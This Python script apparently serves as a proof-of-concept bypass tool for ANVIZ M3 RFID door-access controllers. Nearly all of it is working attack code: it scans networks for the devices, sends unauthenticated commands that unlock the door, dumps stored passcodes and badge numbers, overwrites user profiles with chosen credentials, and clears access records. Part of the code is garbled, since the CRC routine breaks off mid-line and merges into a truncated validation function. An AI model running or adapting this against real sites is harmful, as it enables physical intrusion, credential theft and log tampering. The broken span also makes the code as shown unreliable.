#!/usr/bin/python3 PROGNAME = "ANVIZ M3 RFID PoC" AUTHOR = "WizLab.it" VERSION = "0.7" BUILD = "20190508.049" import os, platform import sys import socket import struct import argparse import datetime from _socket import AF_INET #Payloads PAYLOAD_STATUS = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x3c, 0x00, 0x00] PAYLOAD_OPENDOOR = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x5e, 0x00, 0x00] PAYLOAD_SERIAL_NUMBER = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x24, 0x00, 0x00] PAYLOAD_FIRMWARE_VERSION = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x30, 0x00, 0x00] PAYLOAD_GET_USERS_START = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x72, 0x00, 0x02, 0x01, 0x0a] PAYLOAD_GET_USERS_CONTINUE = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x72, 0x00, 0x02, 0x00, 0x0a] PAYLOAD_SEND_USER_PROFILE = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x73, 0x00, 0x1f, 0x01, 0x00, 0x00] PAYLOAD_GET_ALL_RECORDS_START = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x40, 0x00, 0x02, 0x01, 0x0a] PAYLOAD_GET_ALL_RECORDS_CONTINUE = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x40, 0x00, 0x02, 0x00, 0x0a] PAYLOAD_GET_NEW_RECORDS_START = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x40, 0x00, 0x02, 0x02, 0x0a] PAYLOAD_CLEAR_NEW_RECORDS = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x4e, 0x00, 0x04, 0x02, 0x00, 0x00, 0x0a] # # Get device status # def status(args): (HOST, PORT) = checkIpPort(args.ip_address, args.port) #Connect and do the dirty work with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: openSocket(s, HOST, PORT) print("Retrieving device status..."); status = sendCommand(s, PAYLOAD_STATUS) print(" - Users: %d" % int.from_bytes(status[0:3], "big")) print(" - Fingerprints: %d" % int.from_bytes(status[3:6], "big")) print(" - Passwords: %d" % int.from_bytes(status[6:9], "big")) print(" - Badges: %d" % int.from_bytes(status[9:12], "big")) print(" - All Records: %d" % int.from_bytes(status[12:15], "big")) print(" - New Records: %d\n" % int.from_bytes(status[15:18], "big")) s.shutdown(socket.SHUT_WR) s.close() except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # # Open door function # def opendoor(args): (HOST, PORT) = checkIpPort(args.ip_address, args.port) #Connect and do the dirty work with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: openSocket(s, HOST, PORT) print("Opening door..."); response = sendCommand(s, PAYLOAD_OPENDOOR) print("Door open!\n"); s.shutdown(socket.SHUT_WR) s.close() except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # #Scan network function # def scan(args): #Check operating system if(platform.system() == "Linux"): if(os.getegid() != 0): print("Scan requires root\n") sys.exit(1) elif(platform.system() == "Windows"): pass else: print("Operating system is: " + platform.system() + "\nScan could not work here...") #Check if scapy is available try: from scapy.all import srp,Ether,ARP,conf conf.verb = 0 except ImportError as msg: print("Error loading Scapy ({})\nPlease install Scapy with command:\n pip3 install scapy\n".format(msg)) sys.exit(1) #Check network try: IP_and_MASK = args.network.split("/") if(len(IP_and_MASK) != 2): raise Exception("Invalid network") socket.inet_pton(AF_INET, IP_and_MASK[0]) IP_and_MASK[1] = int(IP_and_MASK[1]) if((IP_and_MASK[1] < 16) or (IP_and_MASK[1] > 32)): raise Exception("Invalid network") except: print("Invalid network (example: 192.168.1.0/24) [Mask 16-32]\n") sys.exit(1) #Perform network scan print("Scanning network...\n") ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=args.network), timeout=3) devicesFound = 0 for snd,rcv in ans: if(rcv[ARP].hwsrc.startswith("00:22:ca:")): devicesFound += 1 print(" - ANVIZ device at IP %s (MAC: %s)" %(rcv[ARP].psrc, rcv[ARP].hwsrc)) print(("\n" if (devicesFound > 0) else "") + "Scan complete (" + str(devicesFound) + " device" + ("" if (devicesFound == 1) else "s") + " found)\n") # #Get device serial number # def serialnumber(args): (HOST, PORT) = checkIpPort(args.ip_address, args.port) #Connect and do the dirty work with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: openSocket(s, HOST, PORT) print("Retrieving serial number..."); serialnumber = sendCommand(s, PAYLOAD_SERIAL_NUMBER) print("Serial number: %s\n" % serialnumber.decode("utf-8")); s.shutdown(socket.SHUT_WR) s.close() except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # #Get device firmware version # def firmwareversion(args): (HOST, PORT) = checkIpPort(args.ip_address, args.port) #Connect and do the dirty work with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: openSocket(s, HOST, PORT) print("Retrieving firmware version..."); firmwareversion = sendCommand(s, PAYLOAD_FIRMWARE_VERSION) print("Firmware version: %s\n" % firmwareversion[0:9].decode("utf-8")); s.shutdown(socket.SHUT_WR) s.close() except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # # Get users on device # def getusers(args): (HOST, PORT) = checkIpPort(args.ip_address, args.port) #Connect and do the dirty work with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: openSocket(s, HOST, PORT) print("Retrieving users..."); print("." + ("-" * 58) + ".") print("| " + "ID".ljust(10, " ") + "| " + "PASSCODE".ljust(10, " ") + "| " + "CARD ID".ljust(10, " ") + "| " + "NAME".ljust(20, " ") + " |") print("|" + ("-" * 11) + "+" + ("-" * 11) + "+" + ("-" * 11) + "+" + ("-" * 22) + "|") users = sendCommand(s, PAYLOAD_GET_USERS_START) isLastPacket = decodeUsersPacket(users) while(isLastPacket == False): users = sendCommand(s, PAYLOAD_GET_USERS_CONTINUE) isLastPacket = decodeUsersPacket(users) print("'" + ("-" * 58) + "'") s.shutdown(socket.SHUT_WR) s.close() except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # # Update user on device # def updateuser(args): (HOST, PORT) = checkIpPort(args.ip_address, args.port) #User details try: if((args.userid < 1) or (args.userid > 65536)): raise Exception("Invalid user ID") if((args.userpass < 1) or (args.userpass > 999999)): raise Exception("Invalid user passcode") if((args.usercard < 1) or (args.usercard > 16777215)): raise Exception("Invalid user card") args.username = args.username[0:10] except Exception as msg: print("Invalid user details: %s\n" % msg) sys.exit(1) #Send new user details payload = PAYLOAD_SEND_USER_PROFILE payload += struct.pack(">L", args.userid)[1:] payload += struct.pack(">L", ((args.userpass & 0x000FFFFF) | 0x00600000))[1:] payload += bytes([0x00]) payload += struct.pack(">L", args.usercard)[1:] payload += bytes(args.username.encode("ASCII").ljust(10, bytes([0x00]))) payload += bytes([0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40]) #Connect and do the dirty work with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: openSocket(s, HOST, PORT) print("Updating user details..."); response = sendCommand(s, payload) print("User updated") s.shutdown(socket.SHUT_WR) s.close() except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # # Get records # def getrecords(args): (HOST, PORT) = checkIpPort(args.ip_address, args.port) #Connect and do the dirty work with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: openSocket(s, HOST, PORT) print("Retrieving records..."); print("." + ("-" * 49) + ".") print("| " + "ID".ljust(10, " ") + "| " + "DATE/TIME".ljust(23, " ") + "| " + "CHANNEL".ljust(10, " ") + " |") print("|" + ("-" * 11) + "+" + ("-" * 24) + "+" + ("-" * 12) + "|") records = sendCommand(s, (PAYLOAD_GET_NEW_RECORDS_START if (args.type == "new") else PAYLOAD_GET_ALL_RECORDS_START)) isLastPacket = decodeRecordPacket(records) if(args.type == "new"): sendCommand(s, PAYLOAD_CLEAR_NEW_RECORDS) while(isLastPacket == False): records = sendCommand(s, (PAYLOAD_GET_NEW_RECORDS_START if (args.type == "new") else PAYLOAD_GET_ALL_RECORDS_CONTINUE)) isLastPacket = decodeRecordPacket(records) if(args.type == "new"): sendCommand(s, PAYLOAD_CLEAR_NEW_RECORDS) print("'" + ("-" * 49) + "'") s.shutdown(socket.SHUT_WR) s.close() except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # # Process users packet # def decodeUsersPacket(users): if(users[0] == 0): return True for i in range(users[0]): idx = 1 + i * 30 user = users[idx:(idx + 29)] userId = int.from_bytes(user[2:5], byteorder="big", signed=False) userPass = int.from_bytes(user[5:8], byteorder="big", signed=False) & 0x0FFFFF if(userPass == 0x0FFFFF): userPass = "no pass" userCard = int.from_bytes(user[8:12], byteorder="big", signed=False) userName = user[12:22].decode("ASCII").strip(chr(0)) print("| " + str(userId).ljust(10, " ") + "| " + str(userPass).ljust(10, " ") + "| " + str(userCard).ljust(10, " ") + "| " + format(userName, " <20s") + " |") return False # # Process record packet # def decodeRecordPacket(records): if(records[0] == 0): return True for i in range(records[0]): idx = 1 + i * 14 record = records[idx:(idx + 14)] recordUserId = int.from_bytes(record[2:5], byteorder="big", signed=False) recordDatetime = int.from_bytes(record[5:9], byteorder="big", signed=False) recordDatetime = datetime.datetime(2000, 1, 2, 0, 0, 0) + datetime.timedelta(seconds=recordDatetime) recordChannel = int.from_bytes(record[9:10], byteorder="big", signed=False) if(recordChannel == 4): recordChannel = "Passcode" elif(recordChannel == 8): recordChannel = "Card" elif(recordChannel == 128): recordChannel = "Invalid" else: recordChannel = "Unknown" print("| " + str(recordUserId).ljust(10, " ") + "| " + str(recordDatetime).ljust(23, " ") + "| " + str(recordChannel).ljust(10, " ") + " |") return False # # CRC16_MCRF4XX # def crc16_mcrf4xx(data): crc = 0xFFFF for b in data: crc ^= b for i in range(0, 8): if(crc & 0x0001): crc = (crc >> 1) ^ 0x8408 else: crc >>= 1 return struct.pack(" 65535)): raise Exception("Invalid port") except: print("Invalid IP Address and/or Port\n") sys.exit(1) return ipaddress, port # #Receive response # def openSocket(s, host, port): try: print("Connecting to " + host + ":" + str(port) + "... ", end="", flush=True); s.connect((host, port)) s.settimeout(3) print("OK!"); except socket.error as msg: print("\n%s\n" % msg) sys.exit(1) # #Receive response # def sendCommand(s, payload): try: request = payload.copy() request += crc16_mcrf4xx(payload) s.sendall(bytearray(request)) #Send request (payload + CRC) s.recv(3) #Receive header (3 bytes) s.recv(3) #Receive packet type (3 bytes) len = int.from_bytes(s.recv(3), byteorder="big", signed=False) #Receive response lenght (3 bytes) response = s.recv(len) #Read "len" number of bytes s.recv(2) #Receive CRC (2 bytes) except socket.error as msg: print("Communication error: {}\n".format(msg)) sys.exit(1) return response # # MAIN PROGRAM # Argument parser # parser = argparse.ArgumentParser(description="ANVIZ RFID Bypass") parser.add_argument("-v", "--version", help="show program version", action="store_true") subparsers = parser.add_subparsers() parser_scan = subparsers.add_parser("scan", help="scan network looking for ANVIZ devices") parser_scan.add_argument("network", help="network address (example: 192.168.1.0/24)") parser_scan.set_defaults(func=scan) parser_status = subparsers.add_parser("status", help="Device status") parser_status.add_argument("ip_address", help="device IP Address") parser_status.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?") parser_status.set_defaults(func=status) parser_opendoor = subparsers.add_parser("opendoor", help="Open the door") parser_opendoor.add_argument("ip_address", help="device IP Address") parser_opendoor.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?") parser_opendoor.set_defaults(func=opendoor) parser_serialnumber = subparsers.add_parser("serialnumber", help="Get device serial number") parser_serialnumber.add_argument("ip_address", help="device IP Address") parser_serialnumber.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?") parser_serialnumber.set_defaults(func=serialnumber) parser_firmwareversion = subparsers.add_parser("firmwareversion", help="Get device firmware version") parser_firmwareversion.add_argument("ip_address", help="device IP Address") parser_firmwareversion.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?") parser_firmwareversion.set_defaults(func=firmwareversion) parser_getusers = subparsers.add_parser("getusers", help="Retrieve users on device") parser_getusers.add_argument("ip_address", help="device IP Address") parser_getusers.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?") parser_getusers.set_defaults(func=getusers) parser_updateuser = subparsers.add_parser("updateuser", help="Update user on device") parser_updateuser.add_argument("userid", type=int, help="user ID (1-65535)") parser_updateuser.add_argument("userpass", type=int, help="passcode (000000-999999)") parser_updateuser.add_argument("usercard", type=int, help="user card (1-16777215)") parser_updateuser.add_argument("username", help="user name (max. 10 characters)") parser_updateuser.add_argument("ip_address", help="device IP Address") parser_updateuser.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?") parser_updateuser.set_defaults(func=updateuser) parser_getrecords = subparsers.add_parser("getrecords", help="Retrieve records") parser_getrecords.add_argument("type", choices=["all", "new"], help="Retrieve whether all or new records") parser_getrecords.add_argument("ip_address", help="device IP Address") parser_getrecords.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?") parser_getrecords.set_defaults(func=getrecords) args = parser.parse_args() if args.version: print("{0}\nVersion {1} ({2})\nby {3}\n".format(PROGNAME, VERSION, BUILD, AUTHOR)) elif hasattr(args, "func"): args.func(args) else: parser.print_help()